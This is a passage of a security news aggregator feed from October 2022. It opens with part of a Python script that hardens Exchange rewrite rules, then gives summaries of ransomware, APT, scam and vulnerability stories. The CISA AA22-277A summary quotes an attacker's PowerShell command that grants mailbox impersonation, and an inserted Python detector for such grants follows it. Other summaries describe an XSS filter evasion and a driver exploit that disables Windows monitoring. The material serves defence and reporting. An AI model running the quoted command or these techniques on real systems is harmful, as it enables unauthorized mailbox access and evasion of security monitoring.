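def harden_rewrite_rules(web_config_xml: str) -> str:
    """Switch every {URL} condition input to {REQUEST_URI}; returns the new XML text."""
    root = ET.fromstring(web_config_xml)
    for cond in root.iter("add"):
        if cond.get("input", "").upper() == WEAK_INPUT:
            cond.set("input", HARDENED_INPUT)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for f in audit_rewrite_rules(WEAK_CONFIG):
        print(f"rule {f['rule']!r} matches {f['input']} only: {f['pattern']}")
    print(harden_rewrite_rules(WEAK_CONFIG))
```

In the URL Rewrite module {URL} carries only the path of the request, while {REQUEST_URI} carries the full request URI including the query string, so a blocking rule keyed on {URL} never inspects anything after the `?`. Run a check like this against the web.config of each Exchange front-end site before trusting a hand-applied mitigation; blocking TCP 5985/5986 and disabling remote PowerShell for non-admin users, per the item above, are separate steps that no rewrite rule substitutes for.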


                Linux Cheerscrypt ransomware is linked to Chinese DEV-0401 APT group

                exploits ransomware
                2022-10-04 https://securityaffairs.co/wordpress/136611/malware/apt10-cheerscrypt-ransomware.html

                Researchers link the recently discovered Linux ransomware Cheerscrypt to the China-linked cyberespionage group DEV-0401. Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10). Bronze Starlight has been active since mid-2021; in June, researchers from Secureworks reported that the APT group is deploying […]

                The post Linux Cheerscrypt ransomware is linked to Chinese DEV-0401 APT group appeared first on Security Affairs.

                "

                Autosummary: Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10). Bronze Starlight has been active since mid-2021; in June, researchers from Secureworks reported that the APT group is deploying post-intrusion ransomware families to cover up its cyber espionage operations. "


                Back to Basics: Cybersecurity's Weakest Link

                industry ciber
                2022-10-04 https://thehackernews.com/2022/10/back-to-basics-cybersecuritys-weakest.html
                A big promise with a big appeal. You hear that a lot in the world of cybersecurity, where you're often promised a fast, simple fix that will take care of all your cybersecurity needs, solving your security challenges in one go.  It could be an AI-based tool, a new superior management tool, or something else – and it would probably be quite effective at what it promises to do. But is it a silver "

                Autosummary: All it took was a simple social engineering message, something like, "Hey Bob, I'm from the IT team, and we need to check something on your PC, so I'm sending you a tool for you to run." And it's not just users that need educating: you should reinforce these practices in your security team too, by covering patching, permissions, and overall security positioning. "


                BEC Scammer Gets 25-Year Jail Sentence for Stealing Over $9.5 Million

                financial
                2022-10-04 https://thehackernews.com/2022/10/bec-scammer-gets-25-year-jail-sentence.html
                A 46-year-old man in the U.S. has been sentenced to 25 years in prison after being found guilty of laundering over $9.5 million accrued by carrying out cyber-enabled financial fraud. Elvis Eghosa Ogiekpolor of Norcross, Georgia, operated a money laundering network that opened at least 50 business bank accounts for illicitly receiving funds from unsuspecting individuals and businesses after "

                Autosummary: "


                Hackers are breaching scam sites to hijack crypto transactions

                financial
                2022-10-04 https://www.bleepingcomputer.com/news/security/hackers-are-breaching-scam-sites-to-hijack-crypto-transactions/
                In a perfect example of there being no honor among thieves, a threat actor named "Water Labbu" is hacking into cryptocurrency scam sites to inject malicious JavaScript that steals funds from the scammer's victims. [...] "

                Autosummary: “In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64- encoded JavaScript payload using the “onerror” event, in what is known as an XSS evasion technique, to bypass Cross-Site Scripting (XSS) filters,” details Trend Micro’s report. "


                Optus confirms 2.1 million ID numbers exposed in data breach

                financial
                2022-10-04 https://www.bleepingcomputer.com/news/security/optus-confirms-21-million-id-numbers-exposed-in-data-breach/
                Optus confirmed yesterday that 2.1 million customers had government identification numbers compromised during a cyberattack last month. [...] "

                Autosummary: After not receiving a payment, the hacker leaked the data of 10,000 customers on a hacking forum that included names, addresses, email addresses, phone numbers, and dates of birth. "


                Cheerscrypt ransomware linked to a Chinese hacking group

                exploits ransomware
                2022-10-04 https://www.bleepingcomputer.com/news/security/cheerscrypt-ransomware-linked-to-a-chinese-hacking-group/
                The Cheerscrypt ransomware has been linked to a Chinese hacking group named "Emperor Dragonfly," known to frequently switch between ransomware families to evade attribution. [...] "

                Autosummary: "Differing from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development," explained the Microsoft threat intelligence researchers. "


                AA22-277A: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization

                industry
                2022-10-04 https://us-cert.cisa.gov/ncas/alerts/aa22-277a
                Original release date: October 4, 2022

                Summary

                Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:

                • Enforce multifactor authentication (MFA) on all user accounts.
                • Implement network segmentation to separate network segments based on role and functionality.
                • Update software, including operating systems, applications, and firmware, on network assets.
                • Audit account usage.

                From November 2021 through January 2022, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a Defense Industrial Base (DIB) Sector organization’s enterprise network. During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization’s network, and some APT actors had long-term access to the environment. APT actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and also used a custom data exfiltration tool, CovalentStealer, to steal the victim’s sensitive data.

                This joint Cybersecurity Advisory (CSA) provides APT actors tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. The CSA includes detection and mitigation actions to help organizations detect and prevent related APT activity. CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) recommend DIB sector and other critical infrastructure organizations implement the mitigations in this CSA to ensure they are managing and reducing the impact of cyber threats to their networks.

                Download the PDF version of this report: pdf, 692 KB

                For a downloada "

                Autosummary: The threat actors first used the service account to remotely access the organization’s Microsoft Exchange server via Outlook Web Access (OWA) from multiple external IP addresses; shortly afterwards, the actors assigned the Application Impersonation role to the service account by running the following PowerShell command for managing Exchange:
                powershell add-pssnapin *exchange*;New-ManagementRoleAssignment -Name:"Journaling-Logs" -Role:ApplicationImpersonation -User:<account>
                This command gave the service account the ability to access other users’ mailboxes. In early March 2021, APT actors exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26868, and CVE-2021-27065 to install 17 China Chopper webshells on the Exchange Server.
                DETECTION: Given the actors’ demonstrated capability to maintain persistent, long-term access in compromised enterprise environments, CISA, FBI, and NSA encourage organizations to monitor logs for connections from unusual VPSs and VPNs, and to monitor for the installation of unauthorized software, including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect). To detect use of compromised credentials in combination with a VPS, review logs for "impossible logins," such as logins with changing username, user agent strings, and IP address combinations, or logins where IP addresses do not align to the expected user’s geographic location.
                Table 1: Identified APT Enterprise ATT&CK Tactics and Techniques
                Tactic: Initial Access
                Technique Title: Valid Accounts | ID: T1078 | Use: Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion (e.g., inappropriate or unauthorized use of administrator accounts, service accounts, or third-party accounts). "
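The role assignment quoted in the summary is a concrete thing to hunt for. The Python below is an added example, not from the advisory: it scans constructed Exchange admin audit records (the pipe-separated field layout and the Key=Value parameter format are assumptions about an exported Search-AdminAuditLog result, not a real log format; check your own export) and flags any New-ManagementRoleAssignment that grants ApplicationImpersonation. It keys on the role rather than the assignment name, because the actors chose a benign-looking name, and it marks the case where the caller granted the role to itself.

```python
"""Added example, not from CISA advisory AA22-277A: flag management role
assignments that grant ApplicationImpersonation in exported Exchange admin audit
records. The record layout below (RunDate|Caller|CmdletName|Key=Value;...) is an
assumption used for illustration, not a documented export format."""
from __future__ import annotations

from dataclasses import dataclass

# Roles that let one account read other users' mailboxes. ApplicationImpersonation
# is the one the advisory describes; extend with roles your environment treats as
# sensitive. Compared case-insensitively.
SENSITIVE_ROLES = {"applicationimpersonation"}

# Constructed sample records, not real log data. The first one mirrors the
# advisory's command: a service account granting itself impersonation under a
# benign-looking assignment name.
SAMPLE_RECORDS = [
    "2021-11-02T03:14:00Z|svc-journal|New-ManagementRoleAssignment|"
    "Name=Journaling-Logs;Role=ApplicationImpersonation;User=svc-journal",
    "2021-11-02T03:20:00Z|admin.jane|Set-Mailbox|Identity=bob;ProhibitSendQuota=2GB",
    "2021-11-03T09:00:00Z|admin.jane|New-ManagementRoleAssignment|"
    "Name=HelpdeskRole;Role=Mail Recipients;User=helpdesk",
]


@dataclass(frozen=True)
class Finding:
    run_date: str
    caller: str
    assignment_name: str
    role: str
    assignee: str
    self_assigned: bool  # caller granted the role to its own account


def parse_parameters(raw: str) -> dict[str, str]:
    """Turn 'Key=Value;Key2=Value2' into a dict with lower-cased keys."""
    params: dict[str, str] = {}
    for pair in raw.split(";"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params[key.strip().lower()] = value.strip()
    return params


def find_impersonation_grants(records) -> list[Finding]:
    """Return a Finding for each New-ManagementRoleAssignment whose Role is sensitive."""
    findings = []
    for line in records:
        run_date, caller, cmdlet, raw_params = line.split("|", 3)
        if cmdlet.lower() != "new-managementroleassignment":
            continue
        p = parse_parameters(raw_params)
        role = p.get("role", "")
        if role.lower() not in SENSITIVE_ROLES:
            continue
        # The assignee may be a user or a security group, depending on the cmdlet call.
        assignee = p.get("user") or p.get("securitygroup") or ""
        findings.append(Finding(
            run_date=run_date,
            caller=caller,
            assignment_name=p.get("name", ""),
            role=role,
            assignee=assignee,
            self_assigned=assignee.lower() == caller.lower(),
        ))
    return findings


if __name__ == "__main__":
    for f in find_impersonation_grants(SAMPLE_RECORDS):
        tag = " (self-assigned)" if f.self_assigned else ""
        print(f"{f.run_date} {f.caller} granted {f.role} to {f.assignee} "
              f"as '{f.assignment_name}'{tag}")
```

A Finding whose caller is a service account that normally never runs Exchange management cmdlets, and especially one that is self-assigned, is the pattern the advisory describes; the assignment name is attacker-chosen and carries no signal.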


                CISA orders federal agencies to catalog their networks, and scan for bugs

                exploits
                2022-10-04 https://www.tripwire.com/state-of-security/government/cisa-orders-federal-agencies-catalog-networks-scan-for-bugs/
                You always want to know what is attached to your network. And whether it could be vulnerable or not. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: When informing the media of the new directive, CISA director Jen Easterly highlighted the SolarWinds attack, where a sophisticated hacking group was able to use a poisoned update to the network management software to compromise networks inside government departments, critical infrastructure, and the private sector for months. "


                Researchers Report Supply Chain Vulnerability in Packagist PHP Repository

                exploits
                2022-10-04 https://thehackernews.com/2022/10/researchers-report-supply-chain.html
                Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks. "This vulnerability allows gaining control of Packagist," SonarSource researcher Thomas Chauchefoin said in a report shared with The Hacker News. Packagist is used by the PHP package manager "

                Autosummary: "


                Lazarus APT employed an exploit in a Dell firmware driver in recent attacks

                exploits
                2022-10-04 https://securityaffairs.co/wordpress/136623/apt/lazarus-exploit-dell-firmware-driver.html

                North Korea-linked Lazarus APT has been spotted deploying a Windows rootkit by taking advantage of an exploit for a Dell firmware driver. The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by relying on an exploit for the Dell firmware driver dbutil_2_3.sys, ESET researchers warn. The discovery was made by ESET researchers while […]

                The post Lazarus APT employed an exploit in a Dell firmware driver in recent attacks appeared first on Security Affairs.

                "

                Autosummary: “The attackers then used their kernel memory write access to disable seven mechanisms the Windows operating system offers to monitor its actions, like registry, file system, process creation, event tracing etc., basically blinding security solutions in a very generic and robust way.” "


                Netwalker ransomware affiliate sentenced to 20 years in prison

                exploits ransomware
                2022-10-04 https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-20-years-in-prison/
                Former Netwalker ransomware affiliate Sebastien Vachon-Desjardins has been sentenced to 20 years in prison and ordered to forfeit $21.5 million for his attacks on a Tampa company and other entities. [...] "

                Autosummary: Vachon-Desjardins, a 34-year-old Canadian man extradited from Quebec, was sentenced today in a Florida court after pleading guilty to "Conspiracy to Commit Computer Fraud", "Conspiracy to Commit Wire Fraud", "Intentional Damage to Protected Computer," and "Transmitting a Demand in Relation to Damaging a Protected Computer." "


                How a deepfake Mark Ruffalo scammed half a million dollars from a lonely heart

                financial
                2022-10-04 https://grahamcluley.com/how-a-deepfake-mark-ruffalo-scammed-half-a-million-dollars-from-a-lonely-heart/
                A 74-year-old Manga artist received an unsolicited Facebook message from somebody claiming to be Incredible Hulk actor Mark Ruffalo. You can probably guess where this is heading... "

                Autosummary: The Asahi Shimbun suggests that this may have been a deepfake video, although it’s unclear how they came to this determination: She did not realize at the time that it was a “deepfake” video, and her romantic feelings toward the imposter intensified. "


                ADVA launches network security company to protect mission-critical cloud traffic from cyberattacks

                ciber
                2022-10-04 https://www.helpnetsecurity.com/2022/10/05/adva-network-security/

                ADVA has launched Adva Network Security, a specialist security company committed to protecting mission-critical communication networks from cyberattacks. The new separate company will complement ADVA’s networking technology portfolio with proven and approved security controls to protect mission-critical connectivity applications. It will develop, produce and integrate encryption technology able to withstand increasingly sophisticated threats. With its own IT infrastructure and secure data center facilities in Germany, Adva Network Security will collaborate with national security organizations to … More

                The post ADVA launches network security company to protect mission-critical cloud traffic from cyberattacks appeared first on Help Net Security.

                "

                Autosummary: What’s more, the company offers high-bandwidth quantum-safe transport, enabling customers to apply future-proof security solutions to their infrastructure and guaranteeing that valuable information cannot be seized and stored today, ready to be deciphered when large-scale quantum computers become readily accessible. "


                US Govt: Hackers stole data from US defense org using new malware

                exploits
                2022-10-04 https://www.bleepingcomputer.com/news/security/us-govt-hackers-stole-data-from-us-defense-org-using-new-malware/
                The U.S. Government today released an alert about state-backed hackers using a custom CovalentStealer malware and the Impacket framework to steal sensitive data from a U.S. organization in the Defense Industrial Base (DIB) sector. [...] "

                Autosummary: Identifying suspicious privileged account use after resetting passwords or applying user account mitigations; searching for unusual activity in typically dormant accounts; searching for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity. The joint report from CISA, FBI, and NSA shares a set of YARA rules created to detect activity from this particular threat actor and indicators of compromise for the tools used in the attack: CovalentStealer, HyperBro, and China Chopper. The use of compromised credentials with a VPS may also indicate a potential breach that could be uncovered by: reviewing logs for "impossible logins," e.g. logins with changing username, user agent string, and IP address combinations, or logins where IP addresses do not align with the expected user’s geographic location; searching for "impossible travel," which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart. "


                Huge increase in smishing scams, warns IRS

                financial
                2022-10-04 https://www.malwarebytes.com/blog/news/2022/09/huge-increase-in-smishing-scams-warns-irs

                Categories: News

                Categories: Scams

                Tags: IRS

                Tags: smishing

                The Internal Revenue Service has issued a warning for taxpayers over a recent increase in IRS-themed smishing scams.

                (Read more...)

                The post Huge increase in smishing scams, warns IRS appeared first on Malwarebytes Labs.

                "

                Autosummary: How to avoid falling for a smishing scam: We can't stop smishing completely, but we can take some steps to significantly reduce the chance of falling victim. Firstly, it's important to keep in mind that the IRS does not send emails or texts asking for personal or financial information or account numbers. If you’re being asked to do something, like enter your details, transfer money, or similar, the very best thing you can do is contact the "sender" directly via a known method you trust. "


                Ransomware-affected school district refuses to pay, gets stolen data released

                exploits
                2022-10-04 https://www.malwarebytes.com/blog/news/2022/10/public-school-district-has-data-leaked-by-ransomware-gang

                Categories: News

                Tags: compromise

                Tags: ransomware

                Tags: leak

                Tags: extortion

                Tags: LAUSD

                Data stolen from Los Angeles Unified School District has been leaked online, after staff refused to pay the ransom related to a ransomware attack.

                (Read more...)

                The post Ransomware-affected school district refuses to pay, gets stolen data released appeared first on Malwarebytes Labs.

                "

                Autosummary: I understand there will be many opinions on this matter but, simply said, negotiating with cybercriminals attempting to extort education dollars from our kids, teachers, and staff will never be a justifiable option. Criminals quickly realised they have more chance of payment if they make additional threats, like leaking the stolen data, selling it on, or even hitting the target with DDoS attacks to knock out their systems and networks. "


                Ransomware review: September 2022

                exploits
                2022-10-04 https://www.malwarebytes.com/blog/threat-intelligence/2022/10/ransomware-review-september-2022

                Categories: Threat Intelligence

                In September, LockBit accounted for almost half of all known ransomware attacks.

                (Read more...)

                The post Ransomware review: September 2022 appeared first on Malwarebytes Labs.

                "

                Autosummary: [Chart: Known ransomware attacks by industry sector, September 2022] LockBit 3.0 leak: A few months ago, the LockBit gang released version 3.0 of its ransomware, LockBit 3.0 Black, which was based on source code from BlackMatter ransomware. [Chart: Known ransomware attacks by gang, September 2022] LockBit was involved in almost six times as many attacks as the next most prevalent ransomware, Black Basta, and almost as many attacks as every other variant combined, accounting for 48 percent of known attacks. "


                AlphaSOC Analytics Engine identifies emerging threats in near real-time

                industry
                2022-10-03 https://www.helpnetsecurity.com/2022/10/03/alphasoc-analytics-engine/

                AlphaSOC announced its new AlphaSOC Analytics Engine (AE) solution, a differentiated cloud-native network traffic analysis (NTA) product that uniquely identifies compromised workloads across Amazon Web Services, Microsoft Azure, and Google Cloud Platform. Threat actors bypass existing controls by using novel command and control (C2) infrastructure that is not recognized by legacy security products. Data can also be exfiltrated from victim cloud environments via DNS tunneling, ICMP tunneling, and anonymizing circuit protocols (e.g., Tor, I2P, Freenet) … More

                The post AlphaSOC Analytics Engine identifies emerging threats in near real-time appeared first on Help Net Security.

                "

                Autosummary: “With AlphaSOC AE we are moving the industry from reactive identification of known threats, such as a domain or IP address associated with a threat actor, towards proactive identification of threats, such as a compute instance beaconing to a newly registered domain which is unique to the customer environment and has suspicious properties,” said Chris McNab, CEO and co-founder, AlphaSOC. "


                ESET unveils new cloud and XDR solutions to improve cybersecurity for MSPs

                ciber
                2022-10-03 https://www.helpnetsecurity.com/2022/10/03/eset-protect-platform/

                ESET has launched new cloud and XDR solutions for Managed Service Providers (MSPs). By expanding the ESET PROTECT Platform to include ESET Inspect and ESET Inspect Cloud, MSPs and their business customers will now have access to dedicated XDR security solutions – available on prem or via the cloud. ESET also launched an all new ESET Direct Endpoint Management plugin for Kaseya VSA, as well as native ARM support for macOS. “With this launch, our … More

                The post ESET unveils new cloud and XDR solutions to improve cybersecurity for MSPs appeared first on Help Net Security.

                "

                Autosummary: This launch includes: ESET Inspect Cloud for MSP: Previously released for the enterprise market, ESET Inspect Cloud is a cloud-based tool that enables MSPs to evolve the ESET PROTECT Platform into an XDR solution for enterprise-grade security and risk management capabilities, including advanced threat hunting, incident response, full network visibility, cloud-based threat defense, and more. “When businesses need hardened, next-generation cybersecurity solutions, ESET’s approach to multilayered security plus real time intelligence sets us apart,” said Grant. “We have hundreds of experts and researchers in 13 R&D centers around the world who are analyzing never-before-seen threats, tracking sophisticated APT group activity and creating resources for our partner community that keep them up to date on the latest cybersecurity concerns. "


                Detecting fileless malware infections is becoming easier

                exploits
                2022-10-03 https://www.helpnetsecurity.com/2022/10/03/detecting-fileless-malware-infections/

                For some analysts, memory analysis is only an optional step in cybersecurity investigations. Their reasons are simple. One: Handling memory and volatile data is a complex endeavor, made more difficult by legacy tools. Two: The average analyst is a highly educated individual but is generally not an expert in memory architecture. That knowledge is often reserved for systems engineers. And three: The few analysts who do possess that expertise are writing code or concentrate on … More

                The post Detecting fileless malware infections is becoming easier appeared first on Help Net Security.

                "

                Autosummary: Fileless malware evades widely used endpoint security solutions. When they’re under pressure after a threat has been detected, the instinct many security teams have is to immediately focus on containing it by shutting down and isolating systems. Without memory analysis capabilities, security teams would be hard-pressed to identify fileless malware because it differs from traditional malware in how it breaches systems. By neglecting memory analysis, they risk exposing their systems to fileless malware — a threat that will silently collect valuable information and allow attackers to move laterally between systems while leaving no footprints for incident response tools to identify. "


                How to start and grow a cybersecurity consultancy

                ciber
                2022-10-03 https://www.helpnetsecurity.com/2022/10/03/praveen-singh-cybersecurity-consultancy/

                A cybersecurity industry veteran, Praveen Singh is the co-founder and Chief Information Security Advisor at CyberPWN Technologies, a digital defense consulting firm. In this interview with Help Net Security, he offers insight for anyone interested in building their own cybersecurity consultancy. You have experience across a variety of cybersecurity roles. What motivated you to co-found a company? Building or co-founding a company requires a leap into the unknown, but also significant amounts of fortitude, dedication, … More

                The post How to start and grow a cybersecurity consultancy appeared first on Help Net Security.

                "

                Autosummary: I also had to educate myself in critical areas such as finance, marketing, and sales by reading business advice websites, attending events, joining business groups, and seeking mentors. We have a vendor-agnostic approach, and we always provide a fair scorecard, which pivots around their critical business requirements, regulatory needs, and risk mitigation strategies. With our extensive experience in the field of cybersecurity and consultative approach, we partner with global clients, start-ups, and Fortune 500 companies, aiding them in their cyber transformation journey and helping them achieve strategic business objectives. Building or co-founding a company requires a leap into the unknown, but also significant amounts of fortitude, dedication, drive, and passion. Many factors influence what the outcome will be and when the ultimate goal will be achieved – the type of business, the industry you operate in, the size of the company, investment capital, etc. "


                Many IT pros don’t think a ransomware attack can impact Microsoft 365 data

                exploits ransomware
                2022-10-03 https://www.helpnetsecurity.com/2022/10/03/ransomware-attack-impact-microsoft-365-data/

                Nearly a quarter of businesses have suffered a ransomware attack, with a fifth occurring in the past 12 months, according to Hornetsecurity. The 2022 Ransomware Report, which surveyed over 2,000 IT leaders, revealed that 24% have been victims of a ransomware attack, with 20% of attacks happening in the last year. Cyberattacks are happening more frequently. Last year’s ransomware survey revealed that 21% of companies experienced an attack. This year it rose by three percent … More

                The post Many IT pros don’t think a ransomware attack can impact Microsoft 365 data appeared first on Help Net Security.

                "

                Autosummary: The 2022 Ransomware Report, which surveyed over 2,000 IT leaders, revealed that 24% have been victims of a ransomware attack, with 20% of attacks happening in the last year. "


                Reflected XSS bugs in Canon Medical’s Vitrea View could expose patient info

                exploits
                2022-10-03 https://securityaffairs.co/wordpress/136545/hacking/canon-medical-vitrea-view-xss.html

                Trustwave researchers discovered two XSS flaws in Canon Medical’s Vitrea View tool that could expose patient information. During a penetration test, Trustwave SpiderLabs’ researchers discovered two reflected cross-site scripting (XSS) vulnerabilities, collectively tracked as CVE-2022-37461, in third-party software for Canon Medical’s Vitrea View. The Vitrea View tool allows viewing and securely sharing medical images through […]

                The post Reflected XSS bugs in Canon Medical’s Vitrea View could expose patient info appeared first on Security Affairs.

                "

                Autosummary: "


                MS Exchange zero-days: The calm before the storm?

                exploits
                2022-10-03 https://www.helpnetsecurity.com/2022/10/03/ms-exchange-cve-2022-41040-cve-2022-41082/

                CVE-2022-41040 and CVE-2022-41082, the two exploited MS Exchange zero-days that still have no official fix, have been added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog. But mitigating the risk of exploitation until patches are ready will require patience and doggedness, as Microsoft is still revising its advice to admins and network defenders, and still working on the patches. Exchange zero-days: The current situation. CVE-2022-41040 and CVE-2022-41082 were publicly documented last Wednesday by researchers with … More

                The post MS Exchange zero-days: The calm before the storm? appeared first on Help Net Security.

                "

                Autosummary: The current situation: CVE-2022-41040 and CVE-2022-41082 were publicly documented last Wednesday by researchers with Vietnamese company GTSC, and Microsoft soon after sprang into (discernible) action by offering customer guidance, followed by an analysis of the attacks exploiting the two vulnerabilities. "


                Financial crises boost fraud rates, making online consumers more cautious

                financial
                2022-10-03 https://www.helpnetsecurity.com/2022/10/03/consumers-victim-fraud-video/

                59% of consumers are more concerned about becoming a victim of fraud now than they were in 2021, according to research released by Paysafe. This Help Net Security video reveals how consumers across North America, Latin America and Europe are prioritising security over convenience when making online purchases, as the impact of rising inflation and energy prices continues to fuel financial worries.

                The post Financial crises boost fraud rates, making online consumers more cautious appeared first on Help Net Security.

                "

                Autosummary: "


                Microsoft Exchange server zero-day mitigation can be bypassed

                exploits
                2022-10-03 https://www.bleepingcomputer.com/news/security/microsoft-exchange-server-zero-day-mitigation-can-be-bypassed/
                Microsoft has shared mitigations for two new Microsoft Exchange zero-day vulnerabilities tracked as CVE-2022-41040 and CVE-2022-41082, but researchers warn that the mitigation for on-premise servers is far from enough. [...] "

                Autosummary: CVE-2022-41082 has the same high-severity score but it can be used for remote code execution on vulnerable on-premise Microsoft Exchange Servers by an attacker with “privileges that provide basic user capabilities” (settings and files owned by the user). "


                Live support service hacked to spread malware in supply chain attack

                exploits
                2022-10-03 https://www.bleepingcomputer.com/news/security/live-support-service-hacked-to-spread-malware-in-supply-chain-attack/
                The official installer for the Comm100 Live Chat application, a widely deployed SaaS (software-as-a-service) product that businesses use to communicate with customers and website visitors, was trojanized as part of a new supply-chain attack. [...] "

                Autosummary: "


                Web browser app mode can be abused to make desktop phishing pages

                financial
                2022-10-03 https://www.bleepingcomputer.com/news/security/web-browser-app-mode-can-be-abused-to-make-desktop-phishing-pages/
                The app mode in Chromium-based browsers like Google Chrome and Microsoft Edge can be abused to create realistic-looking login screens that appear as desktop apps. [...] "

                Autosummary: [Image: Phishing Microsoft Teams users with Chrome's app mode (mrd0x.com)] Depending on the use case, an attacker can also use the Browser-in-the-Browser technique to insert a fake address bar by adding the required HTML/CSS, and create clones of software such as Microsoft 365, Microsoft Teams, or even VPN login prompts. "


                There’s good and bad news about the Microsoft Exchange server zero-day exploit

                exploits
                2022-10-03 https://grahamcluley.com/theres-good-and-bad-news-about-the-microsoft-exchange-server-zero-day-exploit/
                Yay, Microsoft has told us how to mitigate against the recently-discovered zero-day attacks. Boo, the mitigations can be bypassed... "

                Autosummary: "


                TD Bank discloses data breach after employee leaks customer info

                financial
                2022-10-03 https://www.bleepingcomputer.com/news/security/td-bank-discloses-data-breach-after-employee-leaks-customer-info/
                TD Bank has disclosed a data breach affecting an undisclosed number of customers whose personal information was stolen by a former employee and used to conduct financial fraud. [...] "

                Autosummary: "


                Fake Microsoft Exchange ProxyNotShell exploits for sale on GitHub

                exploits
                2022-10-03 https://www.bleepingcomputer.com/news/security/fake-microsoft-exchange-proxynotshell-exploits-for-sale-on-github/
                Scammers are impersonating security researchers to sell fake proof-of-concept ProxyNotShell exploits for newly discovered Microsoft Exchange zero-day vulnerabilities. [...] "

                Autosummary: These accounts were under the names "jml4da", "TimWallbey", "Liu Zhao Khin (0daylabin)", "R007er", and "spher0x." "


                Trojanized Comm100 Live Chat app installer distributed a JavaScript backdoor

                exploits
                2022-10-03 https://securityaffairs.co/wordpress/136582/hacking/comm100-supply-chain-attack.html

                A threat actor used a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike disclosed details of a supply chain attack that involved the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Comm100 is a provider of customer service and communication products […]

                The post Trojanized Comm100 Live Chat app installer distributed a JavaScript backdoor appeared first on Security Affairs.

                "

                Autosummary: The malicious installer was used to infect organizations in multiple sectors, including the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe. "


                Actively exploited vulnerability in Bitbucket Server and Data Center

                exploits
                2022-10-03 https://www.malwarebytes.com/blog/news/2022/10/warnings-about-actively-exploited-vulnerability-in-bitbucket-server-and-data-center

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Atlassian

                Tags: Bitbucket

                Tags: git

                Tags: CVE-2022-36804

                Tags: RCE

                Tags: read permission

                International cybersecurity authorities are warning about the active exploitation of a vulnerability in Bitbucket Server and Data Center

                (Read more...)

                The post Actively exploited vulnerability in Bitbucket Server and Data Center appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: October 3, 2022 by International cybersecurity authorities are warning about the active exploitation of a vulnerability in Bitbucket Server and Data Center. On September 29, 2022, the Cybersecurity & Infrastructure Security Agency (CISA) added three vulnerabilities to its catalog of known exploited vulnerabilities. "


                Romance scammer deepfakes Mark Ruffalo to con elderly artist

                financial
                2022-10-03 https://www.malwarebytes.com/blog/news/2022/10/romance-scammer-makes-bank-with-deepfake-mark-ruffalo

                Categories: News

                Tags: romance scam

                Tags: deepfake

                Tags: mark ruffalo

                Tags: manga

                Tags: theft

                Tags: online

                Tags: social media

                We take a look at a romance scammer getting ahead of the game and using deepfakes to steal a huge amount of money from a victim.

                (Read more...)

                The post Romance scammer deepfakes Mark Ruffalo to con elderly artist appeared first on Malwarebytes Labs.

                "

                Autosummary: CBR reports the artist said, in relation to the faker, that "...he respected my work, and he said that I, this old lady, am beautiful". It may not sound like much, but to someone in their 70s, burnt in the past by an abusive marriage, and unfamiliar with internet scams, it was just what the fake doctor ordered. Tips for avoiding romance scams: Romance scams continue to be a major problem, and it’s very much a low effort, big reward attack, which is why it pops up so frequently. "


                Comm100 Chat Provider Hijacked to Spread Malware in Supply Chain Attack

                exploits
                2022-10-03 https://thehackernews.com/2022/10/comm100-chat-provider-hijacked-to.html
                A threat actor likely with associations to China has been attributed to a new supply chain attack that involves the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike said the attack made use of a signed Comm100 desktop agent app for Windows that was downloadable from the company's website. The scale of the "

                Autosummary: The scale of the attack is currently unknown, but the trojanized file is said to have been identified at organizations in the industrial, healthcare, technology, manufacturing, insurance, and telecom sectors in North America and Europe. "


                Researchers Link Cheerscrypt Linux-Based Ransomware to Chinese Hackers

                exploits ransomware
                2022-10-03 https://thehackernews.com/2022/10/researchers-link-cheerscrypt-linux.html
                The recently discovered Linux-based ransomware strain known as Cheerscrypt has been attributed to a Chinese cyber espionage group known for operating short-lived ransomware schemes. Cybersecurity firm Sygnia attributed the attacks to a threat actor it tracks under the name Emperor Dragonfly, which is also known as Bronze Starlight (Secureworks) and DEV-0401 (Microsoft). "Emperor Dragonfly "

                Autosummary: The use of Cheerscrypt is the latest addition to a long list of ransomware families previously deployed by the group in little over a year, including LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0. "


                Hackers Exploiting Dell Driver Vulnerability to Deploy Rootkit on Targeted Computers

                exploits
                2022-10-03 https://thehackernews.com/2022/10/hackers-exploiting-dell-driver.html
                The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by taking advantage of an exploit in a Dell firmware driver, highlighting new tactics adopted by the state-sponsored adversary. The Bring Your Own Vulnerable Driver (BYOVD) attack, which took place in the autumn of 2021, is another variant of the threat actor's espionage-oriented activity called Operation In(ter) "

